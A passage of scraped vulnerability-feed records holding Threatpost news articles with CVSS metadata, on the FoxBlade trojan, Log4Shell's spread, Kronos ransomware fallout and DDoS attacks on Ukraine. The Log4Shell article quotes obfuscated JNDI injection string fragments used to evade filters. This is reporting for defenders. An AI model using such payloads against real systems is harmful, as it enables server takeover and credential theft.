humanitarian aid efforts, and energy sector organizations and enterprises.\n\n\u201cThese attacks on civilian targets raise serious concerns under the Geneva Convention, and we have shared information with the Ukrainian government about each of them,\u201d Smith said.\n\nMicrosoft has also advised the Ukrainian government about recent cyber efforts to steal a range of personally identifiable information (PII), including PII related to health, insurance, transportation and other government data.\n\nMicrosoft has also passed on threat intelligence and defensive strategies to Ukraine\u2019s government so that it could better defend against attacks on military institutions and manufacturers and several other Ukrainian government agencies.\n\n\u201cThis work is ongoing,\u201d Smith said.\n\n## The Ongoing Cyberwar\n\nMicrosoft\u2019s news about FoxBlade comes as just one of a continuing barrage of cyber assaults targeting both Ukraine and Russia: a barrage that\u2019s included the Conti ransomware gang proclaiming that it\u2019s pro-Russia. Last week, it, the extortionists [blared](<https://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion.ly/>) out a warning on their blog, threatening to use Conti\u2019s \u201cfull capacity\u201d to retaliate in the face of \u201cWestern warmongers attempt to target critical infrastructure in Russia or any Russian-speaking region of the world.\u201d\n\nA pro-Ukraine Conti ransomware gang member subsequently [spilled](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) 13 months of the ransomware group\u2019s chats, promising more still to come.\n\nAs well, [ESET](<https://twitter.com/ESETresearch/status/1496581903205511181>) and Broadcom\u2019s[ Symantec](<https://twitter.com/threatintel/status/1496578746014437376>) last week said that they had discovered a new data wiper malware dubbed [**HermeticWiper**](<https://twitter.com/juanandres_gs/status/1496581710368358400>), that\u2019s been used against hundreds of machines in Ukraine. One of the malware samples was compiled back on Dec. 28, pointing to the attacks having been readied two months ago.\n\nThen, on Jan. 13, ** **a destructive wiper malware \u2013 posing as ransomware attacks \u2013 named WhisperGate began to [target](<https://threatpost.com/destructive-wiper-ukraine/177768/>) Ukrainian organizations: an attack that analysts said was likely part of Russia\u2019s wider effort to undermine Ukraine\u2019s sovereignty.\n\nAs well, in mid-February, institutions central to Ukraine\u2019s military and economy \u2013 including government and banking websites \u2013 were slammed with a [wave](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) of DDoS attacks.\n\n## CISA\u2019s Take-Shelter Advice\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA)[ last week warned](<https://www.cisa.gov/uscert/shields-technical-guidance>) that such attacks could spill over Ukraine\u2019s borders.\n\n\u201cDestructive malware can present a direct threat to an organization\u2019s daily operations, impacting the availability of critical assets and data,\u201d CISA[ said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-057a>). \u201cFurther disruptive cyberattacks against organizations in Ukraine are likely to occur and may unintentionally spill over to organizations in other countries.\u201d\n\nOther threats related to the Ukraine/Russia crisis include the typical swarm of threat actors who jump into the fray to exploit the day\u2019s headlines, which, in this situation, convey the haze and confusion of war. Case in point: Malwarebytes has uncovered a spate of [malicious email](<https://threatpost.com/microsoft-accounts-targeted-russian-credential-harvesting/178698/>) bearing the subject line \u201cMicrosoft account unusual sign-in activity.\u201d\n\nCISA provided this list of \u201cImmediate Shields Up Actions\u201d to protect against this wide range of cyber threats:\n\n * Patch[ vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n * Use[ MFA](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).\n * Run antivirus.\n * Enable strong spam filters to prevent phishing emails from reaching end users.\n * Disable ports and protocols that are not essential.\n * Strengthen[ controls for cloud services](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar21-013a>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T16:55:47", "type": "threatpost", "title": "Ukraine Hit with Novel 'FoxBlade' Trojan Hours Before Invasion", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T16:55:47", "id": "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "href": "https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:35", "description": "The internet has a fast-spreading, malignant cancer \u2013 otherwise known as the Apache Log4j logging library exploit \u2013 that\u2019s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.\n\nMost of the attacks focus on cryptocurrency mining done on victims\u2019 dimes, as seen by [Sophos](<https://twitter.com/SophosLabs/status/1470213371521810432>), [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/?ranMID=24542&ranEAID=TnL5HPStwNw&ranSiteID=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&epi=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&irgwc=1&OCID=AID2200057_aff_7593_1243925&tduid=%28ir__cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600%29%287593%29%281243925%29%28TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA%29%28%29&irclickid=_cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600>) and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.\n\nAccording to [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) researchers, beyond coin-miners, they\u2019ve also seen installations of [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.\n\nAlso, it could get a lot worse. Cybersecurity researchers at [Check Point warned](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.\n\n\u201cSince Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,\u201d they said.\n\nThe flaw, which is uber-easy to exploit, has been named [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>). It\u2019s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.\n\n## Mutations May Enable Exploits to Slip Past Protections\n\nOn Monday, Check Point reported that Log4Shell\u2019s new, malignant offspring can now be exploited \u201ceither over HTTP or HTTPS (the encrypted version of browsing),\u201d they said.\n\nThe more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. \u201cIt means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,\u201d they wrote.\n\nBecause of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.\n\n## Tactical Shifts\n\nBesides variations that can slip past protections, researchers are also seeing new tactics.\n\nLuke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to \u201cbingsearchlib[.]com,\u201d with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.\n\nBut since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there\u2019s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.\n\n\u201cThis originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,\u201d Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JDNI) string itself, by taking advantage of other translation features of the JDNI process.\n\nHe offered these examples:\n\n${jndi:${lower:l}${lower:d}a${lower:p}://world80 \n${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}// \n${jndi:dns://\n\n\u2026All of which achieve the same objective: \u201cto download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,\u201d Richards said.\n\n## Bug Has Been Targeted All Month\n\nAttackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.\n\nOn Sunday, Sophos researchers [said](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1470213367142965254%7Ctwgr%5E%7Ctwcon%5Es1_c10&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost-new.php>) that they\u2019d \u201calready detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,\u201d noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.\n\n> Sophos has already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability, and log searches by other organizations (including Cloudflare) suggest the vulnerability may have been openly exploited for weeks. 11/16 [pic.twitter.com/dbAXG5WdZ8](<https://t.co/dbAXG5WdZ8>)\n> \n> \u2014 SophosLabs (@SophosLabs) [December 13, 2021](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw>)\n\n\u201cEarliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,\u201d Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) on Saturday. \u201cThat suggests it was in the wild at least nine days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.\u201d\n\nOn Sunday, Cisco Talos [chimed in](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>) with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. \u201cIt is recommended that organizations expand their hunt for scanning and exploit activity to this date,\u201d it advised.\n\n## Exploits Attempted on 40% of Corporate Networks\n\nCheck Point said on Monday that it\u2019s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it\u2019s seen more than 100 attempts to exploit the vulnerability per minute.\n\nAs of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.\n\nThe map below illustrates the top targeted geographies.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/13121325/map.jpg>)\n\nTop affected geographies. Source: Check Point.\n\nHyperbole isn\u2019t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: \u201cIt wouldn\u2019t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,\u201d Dali noted via email on Monday. \u201cConnecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren\u2019t taken right away.\u201d\n\nAs has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability \u201cis relatively easy to exploit, and we\u2019ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,\u201d Dali reiterated. \u201cHopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.\u201d\n\nThis situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we\u2019ve seen, along with some of the new protections and detection tools.\n\n## More News\n\n * ** **[**Linux botnets have already exploited the flaw.**](<https://securityaffairs.co/wordpress/125562/malware/linux-botnets-log4shell-flaw.html?utm_source=feedly&utm_medium=rss&utm_campaign=linux-botnets-log4shell-flaw>) [NetLab 360](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) reported on Saturday that two of its honeypots have been attacked by the [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>) and [Mirai](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) botnets. Following detection of those attacks, the Netlab 360 team found [other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) on the hunt for the Log4Shell vulnerability, including the DDoS family Elknot, the mining family m8220, SitesLoader, xmrig.pe, xmring.ELF, attack tool 1, attack tool 2, plus one unknown and a PE family. [BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/>) also reports that it\u2019s observed the threat actors behind the [Kinsing](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) backdoor and cryptomining botnet \u201cheavily abusing the Log4j vulnerability.\u201d\n * [**CISA has added Log4Shell to the Known Exploited Vulnerabilities Catalog**](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>).\n * [**Quebec shut down thousands of sites**](<https://securityaffairs.co/wordpress/125556/hacking/quebec-shut-down-sites-log4shell.html?utm_source=feedly&utm_medium=rss&utm_campaign=quebec-shut-down-sites-log4shell>) after disclosure of the Log4Shell flaw. \u201c\u201dWe need to scan all of our systems,\u201d said Canadian Minister Responsible for Digital Transformation and Access to Information Eric Caire in a news conference. \u201cWe\u2019re kind of looking for a needle in a haystack.\u201d\n\n## New Protections, Detection Tools\n\n * On Saturday, Huntress Labs released a tool \u2013 [available here](<https://log4shell.huntress.com/>) \u2013 to help organizations test whether their applications are vulnerable to CVE-2021-44228.\n * Cybereason released [Logout4Shell](<https://github.com/apache/logging-log4j2/pull/608>), a \u201cvaccine\u201d for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.\n\n## Growing List of Affected Manufacturers, Components\n\nAs of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list [hosted on GitHub](<https://github.com/YfryTchsGD/Log4jAttackSurface>) that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. The list indicates whether they\u2019re affected by Log4Shell and provides links to evidence if they are.\n\nSpoiler alert: Most are, including:\n\n * [Amazon](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Amazon.md>)\n * [Apache Druid](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheDruid.md>)\n * [Apache Solr](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheSolr.md>)\n * [Apache Struts2](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheStruts2.md>)\n * [Apple](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/apple.md>)\n * [Baidu](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Baidu.md>)\n * [CloudFlare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/CloudFlare.md>)\n * [DIDI](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/DIDI.md>)\n * [ElasticSearch](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ElasticSearch.md>)\n * [Google](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Google.md>)\n * [JD](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/JD.md>)\n * [LinkedIn](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/LinkedIn.md>)\n * [NetEase](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/NetEase.md>)\n * [Speed camera LOL](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/SpeedCamera.md>)\n * [Steam](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Steam.md>)\n * [Tesla](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tesla.md>)\n * [Tencent](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tencent.md>)\n * [Twitter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Twitter.md>)\n * [VMWare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWare.md>)\n * [VMWarevCenter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWarevCenter.md>)\n * [Webex](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Webex.md>)\n\n## A Deep Dive and Other Resources\n\n * **Immersive Labs** has posted a[ hands-on lab](<https://www.linkedin.com/posts/immersive-labs-limited_in-december-a-zero-day-vulnerability-affecting-activity-6876088019028336640-MtYh>) of the incident.\n * **Lacework** has published a [blog post ](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) regarding how the news affects security best practices at the developer level.\n * **NetSPI** has published a [blog post](<https://www.netspi.com/blog/executive/security-industry-trends/log4j-zero-day-vulnerability-impact/>) that includes details on Log4Shell\u2019s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.\n\nThis is a developing story \u2013 stay tuned to Threatpost for ongoing coverage.\n\n121321 13:32 UPDATE 1: Added input from Dor Dali and Luke Richards. \n121321 14:15 UPDATE 2: Added additional botnets detected by NetLab 360.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:14:46", "type": "threatpost", "title": "Log4Shell Is Spawning Even Nastier Mutations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:14:46", "id": "THREATPOST:34D98758A035C36FED68DDD940415845", "href": "https://threatpost.com/apache-log4j-log4shell-mutations/176962/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Remember when Kronos, the workforce-management workhorse, got [whacked](<https://threatpost.com/kronos-ransomware-outage-payroll-chaos/176984/>) by ransomware in December, right in time to gum up end-of-year HR busywork such as bonuses and vacation tracking?\n\nCould take days to crawl back, Ultimate Kronos Group (UKG) [said](<https://community.kronos.com/s/feed/0D54M00004wJCdJSAW?language=en_US>) at the time. Or, then again, could take up to several weeks, it said in a subsequent [update](<https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US>).\n\nIt turns out that dragging its Kronos Private Cloud (KPC) systems back has taken nearly two months. As of Jan. 22, it wasn\u2019t yet done dragging them back, but aggrieved customers had started the process of dragging the company into court as scheduling and payroll was disrupted at [thousands of employers](<https://www.shrm.org/resourcesandtools/hr-topics/technology/pages/ukg-ransomware-disrupts-scheduling-payroll-kronos-private-cloud.aspx>) \u2013 [including hospitals](<https://www.npr.org/2022/01/15/1072846933/kronos-hack-lawsuits>) \u2013 many of which have been forced to log hours manually.\n\nAs NPR reported on Jan. 15, some 8 million people experienced \u201cadministrative chaos\u201d following the attack, including tens of thousands of public transit workers in the New York City metro area, public service workers in Cleveland, employees of FedEx and Whole Foods, and \u201cmedical workers across the country who were already dealing with an omicron surge that has filled hospitals and exacerbated worker shortages.\u201d\n\n020722 18:31 UPDATE: Sportswear manufacturer Puma was one of two UKG customers whose employees\u2019 personally identifying information (PII) \u2013 including their Social Security Numbers (SSNs) \u2013 was stolen by attackers. See below for more details.\n\n020822 10:55 UPDATE: A UKG spokesperson reached out to Threatpost to clarify the that the September Puma breach, which resulted in stolen source code, was unrelated to UKG\u2019s December ransomware attack on Kronos Private Cloud. UKG subsequently discovered that Puma was one of two customers who had employee PII compromised as a result of the ransomware attack. Puma was a Kronos Private Cloud customer, and the affected employees and their dependents are in the process of being notified, he said.\n\n## Furious and Filing Suits\n\nAs far as UKG\u2019s gratitude for customers\u2019 patience goes, it might be a little aspirational.\n\nCustomers were already seething over the company\u2019s lack of communication as the weekend unwound following the Saturday, Dec. 11 discovery of the attack. They [complained](<https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US>) [about](<https://community.kronos.com/s/feed/0D54M00004wJCdJSAW?language=en_US>) poor communication, a lack of information about whether their data was still out there somewhere, that the company\u2019s portal and support site had gone AWOL right in the thick of things, and that the \u201cweeks\u201d or \u201cdelays\u201d to restore systems was insupportable.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/03172618/Kronos-customers-fuming-e1643927213846.jpg>)\n\nKronos customers\u2019 complaints. Source: Kronos Community Forum.\n\nThe subsequent lawsuits include a [class action](<https://www.classaction.org/news/new-york-mta-employees-owed-unpaid-overtime-following-kronos-data-breach-lawsuit-alleges>) filed by New York transit workers claiming that the Metropolitan Transportation Authority has \u201cfailed to pay certain employees any overtime wages since their payroll administrator was crippled by a December 2021 data breach.\u201d\n\nWorkers at Tesla and PepsiCo have also brought separate [lawsuits](<https://searchhrsoftware.techtarget.com/news/252512253/Tesla-PepsiCo-workers-bring-lawsuit-over-UKG-payroll-outage#:~:text=Lawsuits%20over%20the%20ransomware%20attack,inaccurate%20pay%20during%20the%20outage.&text=Two%20workers%2C%20one%20at%20Telsa%20Inc.&text=subsidiary%2C%20are%20suing%20the%20Ultimate,short%20of%20what%20they%20earned.>) over the UKG payroll outage, claiming that they received inaccurate pay during the outage.\n\nAs well, at the end of December, West Virginia\u2019s state auditor, J.B. McCuskey [promised](<https://wvmetronews.com/2021/12/31/mccuskey-promises-lawsuit-against-state-contractor-if-damages-for-payroll-problems-are-left-unpaid/>) that \u201cwe\u2019re going to hold Kronos accountable\u201d for what he called the \u201creal pain in the rear end\u201d of having to manually input information for more than 37,000 state employees before they got their first paychecks of 2022.\n\n020722 17:54 UPDATE: UKG didn\u2019t respond to Threatpost\u2019s inquiries regarding when it expects all of its systems to be fully restored. On Thursday evening, a company spokesperson pointed Threatpost to an [FAQ](<https://www.ukg.com/KPCupdates/kpc-faq>) that states that the company is working with Mandiant and West Monroe \u201cto test and continually harden our environment.\u201d\n\nThe company has identified \u201ca relatively small volume of data that was exfiltrated\u201d \u2013 data that included the personal details of two customers\u2019 employees. Both affected customers have been notified, it said.\n\nIn September, The Record [reported](<https://therecord.media/hackers-stole-puma-source-code-no-customer-data-company-says/>) that one of those customers was Puma, the sportswear manufacturer. The attackers stole source code, according to The Record. As of late August, they were trying to extort the company into paying ransom for it, threatening to release the files on a leak site if the German company didn\u2019t pay up.\n\n020822 10:44 UPDATE: The two incidents \u2013 Puma\u2019s September breach and the attack on UKG, which provides services to Puma \u2013 are unrelated, contrary to what Threatpost erroneously reported in an earlier update.\n\nAs [BleepingComputer](<https://www.bleepingcomputer.com/news/security/puma-hit-by-data-breach-after-kronos-ransomware-attack/>) reported on Monday after having dug up breach notification letters filed with several attorney generals\u2019 offices, the [breach notification](<https://apps.web.maine.gov/online/aeviewer/ME/40/10394643-6f4e-49ff-884a-9977602932a9.shtml>) UKG filed with the Office of the Maine Attorney General indicated that personal information belonging to Puma employees and their dependents was involved in the breach.\n\nPuma was one of two customers who had employee PII compromised as a result of that incident. Puma was a Kronos Private Cloud customer, and affected employees are in the process of being notified \u2013 hence the filing with the Maine AG\u2019s office.\n\nThat same letter said that data belonging to a total of 6,632 individuals were affected in the UKG breach, including SSNs.\n\n## Customers No Longer Using Pen and Paper\n\nUKG\u2019s core services were restored as of Jan. 22. That leaves \u201ccertain supplementary customer applications\u201d still to be restored. But at this point, customers are no longer using pen and paper for payroll, employee scheduling and other critical functions.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T23:08:49", "type": "threatpost", "title": "Kronos Still Dragging Itself Back From Ransomware Hell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T23:08:49", "id": "THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "href": "https://threatpost.com/kronos-dragging-itself-back-ransomware-hell/178213/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:54", "description": "On Tuesday, institutions central to Ukraine\u2019s military and economy were hit with a wave of denial-of-service (DoS) attacks, which sparked an avalanche of headlines around the world. The strike itself had limited impact \u2014 but the larger implications for critical infrastructure beyond the Ukraine are worth noting, researchers said.\n\nThe targets were core entities to Ukraine: the Armed Forces of Ukraine, the Ministry of Defense, Oschadbank (the State Savings Bank) and Privatbank, the country\u2019s largest commercial bank, servicing nearly [20 million](<https://en.privatbank.ua/about>) customers. Oschadbank and Privatbank are considered \u201c[systemically important](<https://bank.gov.ua/en/news/all/natsionalniy-bank-onoviv-perelik-sistemno-vajlivih-bankiv>)\u201d to Ukraine\u2019s financial markets.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nAdam Meyers, senior vice president of intelligence at CrowdStrike, said via email that the attacks consisted of \u201ca large volume of traffic, three orders of magnitude more than regularly observed traffic, with 99 percent of this traffic consisting of HTTPs requests.\u201d\n\n## **What Happened?**\n\nBy overloading targeted servers, this kind of DoS attack ensured that end users couldn\u2019t access their websites, bank accounts and so on for a period of time. As Ukraine\u2019s Center for Strategic Communications noted in a Facebook [post](<https://www.facebook.com/StratcomCentreUA/posts/290808713119116>), some Privatbank customers found themselves \u201ccompletely unable to access\u201d the company\u2019s app, while others\u2019 accounts \u201cdo not reflect balance and recent transactions.\u201d\n\nSome customers received SMS messages claiming that ATMs were out of order, according to Ukraine\u2019s Cyberpolice, which [tweeted](<https://twitter.com/CyberpoliceUA/status/1493578811492950020>) the claim. Those reports however were debunked, [according 